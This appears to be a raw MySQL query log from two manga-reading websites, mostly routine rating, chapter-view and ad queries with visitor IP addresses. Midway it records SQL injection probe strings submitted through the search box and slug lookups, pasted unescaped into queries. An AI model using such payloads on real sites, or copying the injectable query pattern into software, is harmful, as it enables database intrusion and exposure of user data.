average_rating FROM ratings where manga_id = '209' order by created desc 330657332 Quit 330657333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330657333 Quit 330657334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330657334 Quit 330657335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330657335 Quit 330657336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330657336 Quit 330657337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330657337 Quit 330657338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330657338 Quit 330657339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330657339 Quit 330657340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330657340 Quit 330657341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330657341 Quit 330657342 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330657342 Quit 330657343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330657343 Quit 330657344 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330657344 Quit 330657345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330657345 Quit 330657346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330657346 Quit 330657347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330657347 Quit 330657348 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330657348 Quit 330657349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330657349 Quit 330657350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330657350 Quit 330657351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330657351 Quit 330657352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330657352 Quit 330657353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330657353 Quit 330657354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330657354 Quit 330657355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330657355 Quit 330657356 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330657356 Quit 330657357 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330657357 Quit 330657358 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330657358 Quit 330657359 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330657359 Quit 330657360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330657360 Quit 330657361 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330657361 Quit 330657362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330657362 Quit 330657363 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330657363 Quit 330657364 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330657364 Quit 330657365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330657365 Quit 330657366 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330657366 Quit 330657367 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330657367 Quit 330657368 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330657368 Quit 330657369 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330657369 Quit 330657370 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330657370 Quit 330657371 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330657371 Quit 330657372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330657372 Quit 330657373 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330657373 Quit 330657374 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330657374 Quit 330657375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330657375 Quit 330657376 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330657376 Quit 330657377 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330657377 Quit 330657378 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330657378 Quit 330657379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330657379 Quit 330657380 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330657380 Quit 330657381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330657381 Quit 330657382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330657382 Quit 330657383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330657383 Quit 330657384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330657384 Quit 330657385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330657385 Quit 330657386 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330657386 Quit 330657387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330657387 Quit 330657388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330657388 Quit 330657389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330657389 Quit 330657390 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330657390 Quit 330657391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330657391 Quit 330657392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330657392 Quit 330657393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330657393 Quit 330657394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330657394 Quit 330657395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330657395 Quit 330657396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330657396 Quit 330657397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330657397 Quit 330657398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330657398 Quit 330657399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657399 Quit 330657400 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18390' 330657400 Quit 330657401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657401 Query select * FROM chapters where id = '18390' 330657401 Quit 330657402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657402 Query select * FROM chapters where manga_id = '35' order by id desc 330657402 Quit 330657403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657403 Query Update chapters set view=view+1 where id = '18390' 330657403 Quit 330657404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657404 Query select * FROM chapters where id = '18390' 330657404 Quit 330657405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657405 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18390' 330657405 Quit 330657406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657406 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '18390', '77.224.162.44', 'mangacherri.com', '2026-02-26 03:29:47', '2026-02-26 03:29:47') 330657406 Quit 330657407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657407 Query select * FROM chapter_images where chapter_id = '18390' 330657407 Quit 330657408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657408 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330657408 Quit 330657409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657409 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:48 330657409 Quit 330657410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657410 Quit 330657411 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657411 Quit 330657412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657412 Quit 330657413 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657413 Quit 330657414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657414 Quit 330657415 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657415 Quit 330657416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657417 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657417 Quit 330657416 Quit 330657418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657418 Quit 330657419 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '359' and m.active = 1 330657419 Quit 330657420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657420 Query select * FROM chapters where id = '359' 330657420 Quit 330657421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657421 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330657421 Quit 330657422 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657422 Query Update chapters set view=view+1 where id = '359' 330657422 Quit 330657423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657423 Query select * FROM chapters where id = '359' 330657424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657424 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '359' and m.active = 1 330657423 Quit 330657424 Quit 330657425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657425 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '359', '81.155.48.5', 'mangaberri.com', '2026-02-26 03:29:48', '2026-02-26 03:29:48') 330657425 Quit 330657426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657426 Query select * FROM chapter_images where chapter_id = '359' 330657426 Quit 330657427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657427 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330657427 Quit 330657428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657428 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330657428 Quit 330657429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657429 Quit 330657430 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657430 Quit 330657431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657431 Quit 330657432 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657432 Quit 330657433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657433 Quit 330657434 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657434 Quit 330657435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657435 Quit 330657436 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657436 Quit 330657437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657437 Quit 330657438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330657438 Quit 330657439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657439 Quit 330657440 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1AND//10501((SELECT//CASE//10501//WHEN//10501//THEN//1//ELSE//0//END//FROM//RDBDATABASE)) AND CW0AK7', '169.150.196.30', '2026-02-26 03:29:48') 330657440 Quit 330657441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657441 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1AND//10501((SELECT//CASE//10501//WHEN//10501//THEN//1//ELSE//0//END//FROM//RDBDATABASE)) AND CW0AK7%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1AND//10501((SELECT//CASE//10501//WHEN//10501//THEN//1//ELSE//0//END//FROM//RDBDATABASE)) AND CW0AK7%' ) ) 330657441 Quit 330657442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657442 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\"AND/**/10501=(\'~\'||(SELECT/**/CASE/**/10501/**/WHEN/**/10501/**/THEN/**/1/**/ELSE/**/0/**/END/**/FROM/**/RDB$DATABASE)||\'~\') AND \"CW0AK790\"=\"CW0AK790\"' 330657442 Quit 330657443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657443 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330657443 Quit 330657444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657444 Quit 330657445 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330657445 Quit 330657446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330657446 Quit 330657447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330657447 Quit 330657448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330657448 Quit 330657449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330657449 Quit 330657450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330657450 Quit 330657451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330657451 Quit 330657452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330657452 Quit 330657453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330657453 Quit 330657454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330657454 Quit 330657455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330657455 Quit 330657456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330657456 Quit 330657457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330657457 Quit 330657458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330657458 Quit 330657459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330657459 Quit 330657460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330657460 Quit 330657461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330657461 Quit 330657462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330657462 Quit 330657463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330657463 Quit 330657464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330657464 Quit 330657465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330657465 Quit 330657466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330657466 Quit 330657467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330657467 Quit 330657468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330657468 Quit 330657469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330657469 Quit 330657470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330657470 Quit 330657471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330657471 Quit 330657472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330657472 Quit 330657473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330657473 Quit 330657474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330657474 Quit 330657475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330657475 Quit 330657476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330657476 Quit 330657477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330657477 Quit 330657478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330657478 Quit 330657479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330657479 Quit 330657480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330657480 Quit 330657481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330657481 Quit 330657482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings 